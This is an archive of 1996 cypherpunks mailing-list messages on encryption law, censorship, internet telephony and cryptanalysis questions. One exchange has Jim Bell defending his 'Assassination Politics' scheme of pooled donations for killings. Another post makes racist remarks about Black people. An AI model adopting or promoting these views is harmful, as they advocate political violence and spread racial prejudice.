>
>Again, the problem I see with your scenario is that I don't believe 
>that the courts will interpret it that way. 

What you think is irrelevant.  Most people probably didn't realize what the 
government did in the Amateur Action BBS case was "legal," either.  But they 
did it anyway.

> My interpretation is that 
>if they serve a warrent and I don't decrypt for them and they can 
>prove a felony, then I will be subject to the listed punishment.

Are you assuming that you have the key?  Remember, if you run an encrypted 
anonymous remailer, and assuming you do it honestly, you won't be keeping 
records as to the source of the note.

Thus, if they "serve a warrant" and you CAN'T decrypt the message (or tell 
them where it came from) then why aren't you already guilty?  Remember, the 
wording of the proposed law doesn't require that you have full knowledge of 
the crime involved, merely that you act "in furtherance" of it...   If you 
don't possess the key, but you explicitly ran your remailer so that you 
never it, just so you couldn't relinquish it, you have structured your 
operation too thwart any investigations.  You are ALREADY guilty.  This may 
not sound reasonable, but the government no longer (if it ever did) 
considers "reasonableness" to be an impediment to their actions.


>> Fifth, it isn't clear what amount of knowledge is necessary to
>> "trigger" this clause, especially in its current flawed state. 
>> Since ISP's and encrypted remailers might know, in general, that
>> their systems can and probably are being used for SOME criminal
>> activity, even if they can't identify it or the user, or decrypt it,
>> etc, a broad interpretation of the resulting law could easily
>> de-facto prohibit any business practices (i.e., allowing users to
>> use encryption) that prevents full-scale monitoring and/or tracing.
>
>I disagree, it states you must "willfully endeavor" to use the 
>encryption as a means of obstructing the investigation.  To me, this 
>means that it is the motivation for using the encryption. 

Question:  What, exactly, is the motivation of a person running an anonymous 
remailer?  His motivation is clear:  To allow people to send anonymously 
untraceable messages.  Assuming he's of ordinary levels of intelligence or 
beyond, he is aware that somebody may some day use his system for illegal 
purposes.  You're going to have to explain why a court _CAN'T_ interpret 
this as being in violation of the law.


> If I set 
>up an encrypting remailer for the purpose of allowing free exchange 
>of ideas, I don't believe I would be liable under this law.

Your optimism is touching.  It is also vastly misguided.

>The 
>only way I could see a remailer charged under this is if he had solid 
>evidence that a specific user was violating the law, and took no 
>action.

Gee, I wish you were right, but my experience with government thugs says 
that they will do anything they think they can get away with.


>> This is only the beginning of the problems with this section.  If
>> you can explain why nothing I've described could possibly occur, I
>> welcome a contrary explanation.  
>
>I see some real problems too, but I do not see the problems with this 
>provision to be enough to condemn the entire bill.

I don't "condemn the entire bill."  I would, however, reject the entire bill 
if that provision remains.  And morever, if we make a serious attempt to 
have it removed, the more they resist removing it the more we should insist 
it go.

>I would like to 
>see this portion of the bill ammended to make it clear that only 
>those actually involved in commiting the felony would be held 
>responsible. 

There would still be a problem.  What's the definition of "actually involved 
in committing the felony"?  Are you aware, for example, that manufacturers 
of small plastic screw-top vials have been prosecuted and convicted simply 
because their vials could be used to hold small quantities of drugs such as 
cocaine and crack?  This was a case from a few years back, BTW.  I wish I 
could remember the cite.

If you're not aware of these things, WAKE UP!  Your optimism disgusts me, 
because it is entirely unrealistic and based on a rose-colored-glasses view 
of the government.
 
>> But I would also ask this:  Why, exactly, do we need this section? 
>> We've already been told that the opponents of this bill will fight
>> it tooth-and-nail under its current wording; if that's the case then
>> the presence of this section is inadequate to appease their
>> unhappiness.  Therefore, we shouldn't include it in the bill at all;
>> it does no good.
>> 
>> Any explanations, Dan?
>
>You are talking about the fringe, this, I think, was added as an 
>attempt to bring in those that are in the middle. 

Why would "those that are in the middle" object to a bill which is little 
more than a re-statement of rights we already believe we have?!?

> That is, Those 
>that see the need to prevent the use of encryption as a means of 
>obstructing justice, but feel that we should also have a right to 
>privacy.

There is no viable middle ground here.  Any tool can be abused.

>  To say that there is no delema here is ridiculous, crime is 
>a serious problem that we are already having a terrible time dealing 
>with. 

On the contrary, my opinion is "The _government_ is a serious problem that 
we are already having a terrible time dealing with."   Fortunately, I've 
found a solution, and the government is trying as hard as it can to prevent 
it (and "crypto-anarchy" in general) from taking root.


> I think Leahy realizes that this provision will be about as 
>useful as the "use a gun, go to jail" laws, but wants to give those 
>in the middle to say that they bill will help prevent crime.

Ha ha!  That's rich!  There is no reason that a "pro-encryption" bill has to 
contain any general "anti-crime" clauses.  The average person is afraid of
burglars, 
muggers, murderers, rapists, car thieves.  When is the last time the average 
person was the victim of a crime whose investigation could be "thwarted" by 
the use of encryption?  If you can't think of an example, you've just proved 
my point:  This provision is entirely irrelevant to the average citizen (at 
least in a "positive" way) and can't be considered a "win" for him. 

>> Jim Bell
>> jimbell@pacifier.com
>> 
>> Klaatu Burada Nikto
>
>Good movie.

I'm working on the real-life sequel.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUG+9fqHVDBboB2dAQFd+QP/SwSs1R7dV7tStxg9Hs7Sf9X+q6rWNfa/
d9xWPRpCS81TRhRnpKUxqJu0HZsGQphaEyPRLm1G4f6Z/ZCWsnzR+0XNv6H+FPMG
QKSbCLmgGxnfNEWQmB3BDDJS0KEkNGs6slUvcUS9aRBuKbW6Optu3rYgM/7DCPAq
M1QkmlpC2EU=
=YeFw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 04:50:03 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Assasination Politics
Message-ID: <m0tvSvE-0008zMC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:51 PM 3/8/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"jimbell@pacifier.com"  "jim bell" 13-FEB-1996 14:53:40.39
>>From: Me 
>>>	A. My previously mentioned problem with a limited but non-libertarian
>>>organization.
>
>>I don't deny that such an organization might spring up.  (Anti-abortion 
>>activists are the group which come most immediately to my mind, BTW.  I'm 
>>not in sympathy with them; quite the opposite.)  I've never claimed that 
>>this system is totally immune to such abuse, in the same way that the seller 
>>of a gun can certify that it will never be used to commit a crime.
+__________^^^     

Ooops! my error, I meant "can't."

>	I understand and agree with the gun argument. However, it's still a
>matter of whether Assasination Politics will overall be better or worse than
>the current system. 

The one thing that disappoints me about the result of my presentation of 
this idea is that I haven't heard any intelligent arguments quantitatively 
arguing that things will be worse.  Other proponents simply agree that the 
system would be better; most of the opponents don't take the trouble to 
quantify their objections.  

>If better, then I'll support it if it becomes necessary (I
>still hope for peaceful (or at least relatively peaceful) change - hopefully,
>it has not become necessary for the Declaration of Independence's 
justification
>of revolution to be reused). If worse, I won't. I won't try to stop you from
>doing so, however (currently, there's no way that I could, for instance).

What's interesting is that you see this; yet there are a number of opponents 
who can't seem to realize that what THEY want (or, for that matter, what _I_ 
want) may be absolutely irrelevant to what is actually going to happen.  

>	Incidentally, by "support" I am meaning making suggestions for
>technical improvements. Admittedly, the degree to which I can do so is limited
>by my lack of technical knowledge, but I believe I have thought of some
>workable refinements.

These are the kind of discussions I'd most want to have.  I understand, 
however, that anybody might hesitate a bit to appear to be actively 
encouraging such a system.  That's why I've decided my best function is to 
be the initiator of the idea, and the primary educator.  Somebody else will 
actually develop the system, probably without telling me anything.


>	As well as the obvious problem of unethical assasinations, there is
>also that of a negative reputation being given to various cypherpunk-liked
>ideas (anonymous remailers, fully anonymous digital cash, etcetera) if someone
>notices this.

Perhaps, but most (non-net-using) people are so unaware of encryption as to 
make this irrelevant, I think.


>>> Moreover, Jim Bell is ignoring the other sources of propaganda than
>>>government in convincing the average person that someone is doing something
>>>wrong (when, by my ethics at least, they aren't) - such as religion and
>>>various organizations like the PFDA.
>
>>Again, only a tiny fraction of the population needs to participate...
>
>	However, if more of the population participates, they may do stupid
>things like using an organization that might strike at them - just as they
>currently support a government that can crack down on them. The minority of
>intelligent people - the tiny fraction needed for this to potentially work -
>isn't a factor for this part. In other words, I'm more worried about too _many_
>people - the wrong people - participating rather than too few.

Well, there's not a great deal that we can do to prevent it.  Five years 
ago, I'm sure the then-users of the Internet were fearful of all the newbies 
to come; even today, we may subtly fear those to come.   In other words, 
once WE'RE on the lifeboat, we don't want anyone else to show up!


>>Since "Assassination Politics" is based on a combined-donation system, even 
>>people on a subsistence wage could contribute; a quarter here, a dollar 
>>there, pretty soon it turns into real money.
>
>	That is an argument against it. Do you want the people who give to
>televangelists being able to more directly have people killed than in the
>current system (when at least you've got votes by others to take care of the
>problem)? Unfortunately, the same system of ethics that would make one's
>targets the right ones also excludes the targets (non-governmental figures)
>that can create the problems under this system - like the PFDA leaders.

Have you forgotten what might happen to those same televangelists?

While I'd sure like to be able to design a system where only the "right" 
people die (by my own opinion), I'm under no illusion that this would be 
anything other than a dictatorship under "Jim Bell" or whoever happened to 
be in control.  I think I've done a fairly good job of designing 
(anticipating?) a system that will do a lot of good, hopefully without doing 
a lot of bad.

There may be nothing I can do about the negatives, unfortunately.  

Jim Bell
jimbell@pacifier.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUHG/vqHVDBboB2dAQHitAP/VT/c++g81sgzDPHh2d6wcSmmHgQQg0Rz
Vr3sQt2RYoEZBdLG267IxQw0aYAQvQv2KARD7A+nlbXlM7XR6xQYdjhXQ47hEel0
OBG//UI3XcA8TcdIqOuREi1T+AAWpYYyTz1YpGGR1oMZp6Mv/jjHoZ6f6i2XGY6u
sjHfSLcd5Dg=
=ICpg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 11 Mar 1996 00:28:24 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: FCC v. Internet Phone?
Message-ID: <199603091507.KAA27706@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


TWP March 8: 
 
 
"Long-Distance Dueling. Free Dialing Via Internet Faces a Challenge From
Small Phone Firms." 
 
 
VIA_net 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 02:44:41 +0800
To: cypherpunks@toad.com
Subject: Re: Artist self censorship (Was Chinese net-censorship) Noise
Message-ID: <ad66f75b08021004f035@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:22 PM 3/9/96, Declan B. McCullagh wrote:

>   guilt. The judge then sentenced her to 30 days at MCI Framingham. We
                                                      ^^^^^^^^^^^^^^
>   are currently trying to raise money to pay for her appeal.

Man, making someone work for one of the Phone Companies...that's a pretty
harsh sentence! Maybe that's how that cute "MCI girl" we see on television
got assigned to MCI?

(Or is this MCI an example of AOL, Acronym OverLoading?)

--Klaus!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 10 Mar 1996 00:29:07 +0800
To: cypherpunks@toad.com
Subject: Re: Artist self censorship (Was Chinese net-censorship) Noise
In-Reply-To: <199603091145.MAA24434@utopia.hacktic.nl>
Message-ID: <0lEO9C600YUu43T39v@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Mar-96 Artist self censorship
(Was.. by Anonymous@REPLAY.COM 
> Mr. Avon should think twice before commenting on self censorship does not
> exist, for that could be the difference from having the door kicked in by the
> black ninja turtles with the FBI or toning down your work.

Here's some info from http://world.std.com/~kip/ on the Angeli "child
porn" case that's going on now in Cambridge, MA. I was visiting Harvey
Silverglate's law offices last week and saw the photographs, and they're
anything but pornographic. They're essentially the same as the photos my
grandparents have of me and my cousins naked in the tub.

But that's cold comfort when you're locked up and doing time. 

-Declan


   Toni Marie Angeli, for a Harvard photography course, decided to make
   her four-year-old son Nico the subject of her final class project, The
   Innocence of a Child's Nudity. After discussing the project with her
   professor, Angeli began her project with a few shots of Nico and made
   the fatal mistake of taking her roll of film to Zona Photographic Labs
   on Rogers Street in Cambridge, Massachusetts. The Zona owners were
   "alarmed" and called the Cambridge police, who went to Zona, looked at
   contact sheets prepared by Zona without Angeli's authorization, and
   decided that the pictures were "gross." Zona and the Cambridge police
   set up a sting operation, requiring Zona employees to lie, so that the
   police could come to Zona and confront her about her "pornography"
   when she came to pick up her negatives. On November 2, Angeli went to
   Zona, accompanied by Nico and by her husband, Luke D'Ancona. An
   altercation ensued when Angeli realized why the police were there.
   Angeli was handcuffed, manhandled into a back room, beaten and choked.
   During the scuffle a lamp was knocked over, and a picture fell off the
   wall. A hollow core door was also damaged when Angeli kicked out as
   she was being escorted to the police van.
   
   Angeli was never charged with child pornography, but she was charged
   with disorderly conduct, malicious destruction of property under $250,
   and assault and battery with a dangerous weapon. (The police claimed
   that Angeli threw the lamp.). Angeli's trial began on January 24,
   1996, and a verdict was brought in on January 30. She was acquitted of
   the assault-and-battery charges, but convicted on the two other
   counts. The judge sentenced her to pay damages, to 50 hours community
   service, and to 18 months of probation. Angeli refused to sign the
   probation contract, stating that she wished to make no admission of
   guilt. The judge then sentenced her to 30 days at MCI Framingham. We
   are currently trying to raise money to pay for her appeal.
   
   It now appears that Angeli's conviction was based on perjured
   testimony from Detective William Phillips.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 10 Mar 1996 00:44:12 +0800
To: cypherpunks@toad.com
Subject: Re: Petty Civil Disobedience
In-Reply-To: <199603091317.IAA12223@yakko.cs.wmich.edu>
Message-ID: <klEOFiW00YUuE3T4cr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Mar-96 Petty Civil Disobedience by
Damaged Justice@yakko.cs 
> Not much crypto relevance, but the CDA has had much more effect than we may
> realize at first. I regularly read about 25 newsgroups with an extremely wide
> range of subject matter, and over the last few weeks I have seen literally
> hundreds of people with things in their .sigs like, "Please excuse this CDA-
> required obscenity: FUCK."
[...]
> Obviously, very few people feel truly threatened by CDA penalties.

That's because of a few possible reasons:

 a) Portions of the CDA are enjoined from being enforced and we have a
legally-binding agreement with the DoJ covering the rest. So the fear of
prosecution is not great.
 b) We expect to win court challenge, so fear of prosecution is not great.
 c) Nobody seriously believes the government will prosecute people using
word "FUCK," so fear of prosecution is not great.

The CDA is overbroad, and must be struck down. But at the same time, the
DoJ initially would use it to go after those who have otherwise
Constitutionally-protected porn publicly-available online. (Obscenity is
already illegal.) I'd be more interested in tracking the actions of
owners of adult web sites and those with explicit sexual images...
Perhaps we should put up our own protest web sites with one or two
explicit sexual images as real civil disobedience?

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@atropos.c2.org
Date: Sun, 10 Mar 1996 04:59:29 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: SurfWatch
In-Reply-To: <31414295.4DBE@netscape.com>
Message-ID: <199603091850.KAA28923@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	the big web engines already are getting their most hits for
the words on the http://www.c2.org/ page (see the source, it's in
comments.)
	I still need to write mod_hotbabes.c for apache, though.


> 
>   I predict that 6 months after the first internet rating system is widely
> deployed, the largest use of search engines such as altavista will be to
> look for pages with the most "naughty" ratings.  Perhaps such services will
> allow text searches for free, but charge for searches based on the rating
> tag...
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Sun, 10 Mar 1996 04:57:45 +0800
To: cypherpunks@toad.com
Subject: re: FCC & Internet phones
In-Reply-To: <960309121242.2020bb3e@hobbes.orl.mmc.com>
Message-ID: <Pine.SUN.3.91.960309104642.19290A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


There's also an article in today's San Jose Mercury News.

I'm just wondering how the hell they would enforce regulations on carrying
voice over the Internet. Are they going to analyze every packet? What
happens when someone makes a trivial modification to the code, or adds a
gateway, so that the voice call uses a different UDP (or more likely RTP)
port and header format? 

They could try to make a frontal assault by regulating the Internet 
itself, but they should know better.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Sun, 10 Mar 1996 05:09:16 +0800
To: cypherpunks@toad.com
Subject: Minor challenge: Running IIS on NT Workstation (fwd)
Message-ID: <Pine.SUN.3.91.960309105252.19290B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Meanwhile, back in my other life... any ideas? This could save small
business a lot of money. 

-rich

---------- Forwarded message ----------
To: hackmsoft@c2.org

I was at Microsoft the other day and one of the sales guys told 
me that there is a fix for the IIS (Internet Information Server) 
that makes it run on Windows NT Workstation.  There is something 
in the registry that the application checks.  He backed out from 
giving me the fix.  I guess they want to sell more NT Server 
than Workstation.  It maybe something you may want to watchout 
for.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 10 Mar 1996 01:34:46 +0800
To: cypherpunks@toad.com
Subject: Re: Net Day 96 and AOL
In-Reply-To: <199603090613.WAA04960@ix13.ix.netcom.com>
Message-ID: <9603091634.AA0549@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Bill Stewart <stewarts@ix.netcom.com> writes:

  > Does anybody know if there's an AOL-friendly version of PGP that
  > we can donate to the schools...

Private Idaho is probably the best bet for AOL email.  So far as I
know, only cut-n-paste shells work with the wacky AOL mail editor.

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc North <mnorth@netcom.com>
Date: Sun, 10 Mar 1996 05:35:06 +0800
To: cypherpunks@toad.com
Subject: Index of Coincidence
Message-ID: <Pine.SUN.3.91.960309113033.18346B-100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain



I'm new to the mailing list, but I have grep'd tcmay's CP-FAQ and all
related FAQs for this, but have yet to find anything. 

I'm looking for detailed information on a statistical tool to aid in
cryptanalysis called an "index of coincidence".  I would appreciate it if
someone could please explain what this is, how one builds such an index
against a given ciphertext, and how it is valuable in the cryptanalysis of
said ciphertext. 

Many thanks,

Marc

--
.--------------------------------------------------------.
| Marc North  <*>  mnorth@netcom.com  <*>  San Jose, CA. |
`--------------------------------------------------------'





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sun, 10 Mar 1996 04:37:26 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <199603091840.LAA21661@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 9 Mar 1996, "Dave Emery" wrote:

>The article also points out that in a state with a 7% black population 43%
of the
>three time losers are black.

Right on, bro!  This is the kind of institutionalized racism that we all
deplore! In fact...hey, wait a sec.  Hmmm, 7% of the population; what was
the percentage of black rioters in the "motorist" Rodney "Why can't we all
live together?" King "peace demonstration"?

Yo, homes:  of the 50K gang members in L.A., what percentage is non-black?

Give it a f... (oops) I mean, gosh darn rest.

ObCrypto:  Perry, please consult Dave Emery.  Thanks!

--David M. Rose





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 10 Mar 1996 02:24:22 +0800
To: cypherpunks@toad.com
Subject: re: FCC & Internet phones
Message-ID: <960309121242.2020bb3e@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


  >"Long-Distance Dueling. Free Dialing Via Internet Faces a Challenge From
  >Small Phone Firms." 
   
  You seem to forget that the Internet is just about the *only* electronic 
  communications media not controlled/licensed by the FCC in the US. The 
  FCC also prohibits use of cryptography by those with amateur licenses.
  
  					Warmly,
  						Padgett






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Black (CS)" <black@eng.usf.edu>
Date: Sun, 10 Mar 1996 04:00:56 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Looking for code to run an encrypted mailing list
In-Reply-To: <baHQx8m9LwlQ085yn@netcom.com>
Message-ID: <Pine.SUN.3.91.960309123617.15581F@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Fri, 8 Mar 1996, Alan Bostick wrote:

> Bill Stewart <stewarts@ix.netcom.com> wrote:
> 
> Suppose, though, that the Cypherpunks list was encrypted in this way.
> There are about a thousand listmembers.  Using one IDEA key and the
> multiple-recipients option would mean that the encrypted message would
> consist of a thousand RSA-encrypted session keys followed by the
> IDEA-encrypted cyphertext.  If everyone used a 1024-bit-or-longer key
> pair, then each message would be a megabyte long!

  The way to do it is for the system (listserver) to have everyone's 
public key, and just encrypt every message for that person.  If this 
isn't done already I could get around to writing the program to do this.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
"An idea that is not dangerous is unworthy of being called an idea at all."
Oscar Wilde 
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 9 Mar 1996 20:15:59 +0800
To: cypherpunks@toad.com
Subject: Artist self censorship (Was Chinese net-censorship) Noise
Message-ID: <199603091145.MAA24434@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 8-Mar-96 Re: U.S. State Dept
critici.. by JFA T. QC, Canada@citene & later Declan B. McCullagh.
 
>> There is no such thing as "self-censorship".  Either you stick to 
>> your values, and then it is *not* censorship, or then you do not,
>> and then, it is neither.

>Self-censorship does happen, and it's a growing problem in the arts
>community. (I'm not a commercial artist, so this is my understanding
>from other panelists and speakers at a conference I spoke at last month.)

>Making art more palatable or less "extreme" to curry favor with
>corporate patrons, or to get that NEA grant, or to get that faculty
>position is self-censorship, and it does happen.

There is a photographer by the name of Jock Sturgis who is famous for
his photographs of naturalists and their children on the beaches of California
and France.  Sturgis' home was raided by the FBI and all of his photographs,
equipment, & records were seized under suspicion of producing child pornography

The photo equipment, records, and photographs were returned but not after 
making Sturgis' life a living hell...

Sturgis' work which has critical acclaim throughout art circles and has
published
two books profiling naturalists, has been quoted to saying that before taking
a picture he usually asks himself about how this picture is percived, something
the he never thought twice before the FBI raid.

Mr. Avon should think twice before commenting on self censorship does not
exist, for that could be the difference from having the door kicked in by the
black ninja turtles with the FBI or toning down your work.

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 10 Mar 1996 03:24:28 +0800
To: cypherpunks@toad.com
Subject: Re: FCC & Internet phones
Message-ID: <199603091747.MAA04258@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A. Padgett Peterson P.E. Information Security wrote:
>   You seem to forget that the Internet is just about the *only* electronic
>   communications media not controlled/licensed by the FCC in the US. The
>   FCC also prohibits use of cryptography by those with amateur licenses.

Yes... but the Internet is not like HAM radio. The FCC has no
jurisdiction outside the US, and it would cause various problems
for them to try to regulate the use of IPhone or how ISPs operate.

On another note, I wonder how the Leahy bill would affect use of
crypto by HAMs....
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUHENyoZzwIn1bdtAQE1XwF9EP/jLWWk2gd41oNnkNF88lhTpa7PvGEU
iEBdP8oalQfanQz/WcBjYQ9ilXEXxOqo
=+FDh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Choi (SAR)" <choi@virtu.sar.usf.edu>
Date: Sun, 10 Mar 1996 03:35:19 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Integrity in the arts
In-Reply-To: <9603090731.AA27437@cti02.citenet.net>
Message-ID: <Pine.SUN.3.91.960309124021.261A-100000@virtu>
MIME-Version: 1.0
Content-Type: text/plain


> >Making art more palatable or less "extreme" to curry favor with
> >corporate patrons, or to get that NEA grant, or to get that faculty
> >position is self-censorship, and it does happen.
> 
> No, it does not.  Making art more palatable is simply the process of 
> free trade between two uncoerced entities.  If the artist does not offer
> what the corporate purchaser wants he will not sell.  He thus adapt his
> style out to his customer.  Nobody is threatening to use force to
> have the artist conform to the client.  Nobody is forcing the client 
> to buy what he does not like.
> 
> The artist does not have to compromise, he simply have to refuse the 
> contract.
> 
Well, my did is an artist, and I have to say that you really have to 
consider the "human" aspects of it before you rattle off refusing 
contracts for art.  Artists do art because they think they're good at it, 
or prefer art as a career field more than any other, presumbably.  When 
you have to feed a) yourself b) your family, taking contracts seems that 
much more palatable.  I admit, I don't like it either, but, to use a far 
more philosophical arena, sometimes people make the sacrifices that they 
do ( in terms of integrity and pride ) for the long run.  Sometimes 
people feel they have no choice at any point in their lives.  Sometimes 
people have nothing BUT artistic integrity.  Those who take the latter 
often get the respect of other artists, but respecting one's example is not 
the same as following one's example; who knows how many years of 
suffering you have to go through before you make it, if you make it at 
all ( case in point; Van Gogh, who only sold 1 painting his entire life ).
This argument may not seem all too relevant to this forum until you 
consider integrity of information, and start to consider how much one is 
and is not willing to sacrifice to others, say the authorities or to a 
society, in the first place.  It becomes quite important then; admittedly 
in a roundabout way.

							Sincerely.
							Quentin Holte.
							( aka Charles Choi. ) 
							
							You are all the Buddha.
								- Last words
								  of Buddha.

							If you see the Buddha,
                                            		             kill him.
                                                                - Zen proverb.

On Sat, 9 Mar 1996, Jean-Francois Avon wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Excerpts from internet.cypherpunks: 8-Mar-96 Re: U.S. State Dept
> >critici.. by JFA T. QC, Canada@citene 
> >> There is no such thing as "self-censorship".  Either you stick to 
> >> your values, and then it is *not* censorship, or then you do not,
> >> and then, it is neither.
> >
> >Self-censorship does happen, and it's a growing problem in the arts
> >community. (I'm not a commercial artist, so this is my understanding
> >from other panelists and speakers at a conference I spoke at last month.)
> >
> Anybody using the term "censorship" to describe that is in the following
> situation : he *wants* the advantages of the contract (money) without
> respecting the customer, therefore.  He deplores the fact that somebody
> (the customer) can act to his best judgment.  The fact that the artist
> calls that censorship shows that he have the same thought process as
> the true censorers, i.e. the conviction that the end justify the means,
> and more specifically, the feeling that *his* ends justify *any* means.
> 
> The artist may not act on his feelings but nevertheless, they are, in
> essence, of this nature.
> 
> And unfortunately, too many artists think that way.
> 
> JFA
> Accepting a grant is accepting stolen money.
> The collectivists and their free-lunchers be DAMNED!
> Restore an objective monetary standard such as gold!
> 
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2i
> 
> iQEVAwUBMUDVbsiycyXFit0NAQHG0gf+P1rmX5xQiRo5sHpvYBlvvclVdGxJaJ6c
> E+n35ln3/FFMGiguk5TEr6tOG+vj6UNBW2VibggQ9HkMkQ+6yTeJRrWQVje+YxxY
> pygYrY6wfDB8F9aemkVIiypZqvo+UrG+IZwKSsuqZuFmyxu5VsnAzFB/NQS6z/fq
> WPnm23t51kj2d6e+1PDVJRmv1Gpjaj34xt9YIif7S7fXdMI8vRbopRkoFfbXcFsE
> +I+fzeIPINXde44duW/tUmVbPZcrwxNgL0xo7AZ3fwzYGqOw2cR3zNFH9iPWs6O5
> iV+fNIx2f1sKl1MbkydEHtPVctLT3cqX0Bvi5f0k6XKdzmCMGSOr9g==
> =qWzV
> -----END PGP SIGNATURE-----
> 
>  Public Key at http://w3.citenet.net/users/jf_avon
>     Jean-Francois Avon <jf_avon@citenet.net> 
>     2048 bits key ID:C58ADD0D  1996/03/01    
> fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 10 Mar 1996 04:19:32 +0800
To: cypherpunks@toad.com
Subject: Re: Artist self censorship (Was Chinese net-censorship) Noise
Message-ID: <9603091820.AA14468@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

nobody@REPLAY.COM (Anonymous) said:

>before taking
>a picture he usually asks himself about how this picture is percived,
something
>the he never thought twice before the FBI raid.
>
>Mr. Avon should think twice before commenting on self censorship does not
>exist, for that could be the difference from having the door kicked in by the
>black ninja turtles with the FBI or toning down your work.

OK.  *THAT* might be interpreted, wrongly, as self-censorship.  But words 
have a *precise* meaning, which unfortunately, I sometimes miss in 
the english language.

The opinion I wrote was in the *context* of the interaction of an artist with
a purchaser.  In that context, what govern the events is consensuality:
everybody acts *uncoerced* to his best advantage.


In the case you cite, the *context* is very different.

But still, I would not call it "self-censorship".  I do not have, on the top
of my head, any precise term for it, but maybe FUD, fear of physical violence,
survival tactics while harrassed by a thuggish assaulter, etc.,  would
apply...


I did not think twice, I thought about it several hundred times...

Your comment is *very* interesting.  It point out how peoples can so
easily blank out contextual information.

Forgive my bias but I personnally makes a big distinction between the 
volitional initiation of physical violence (or menace of) and other situations
where it is absent.

Regards!

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

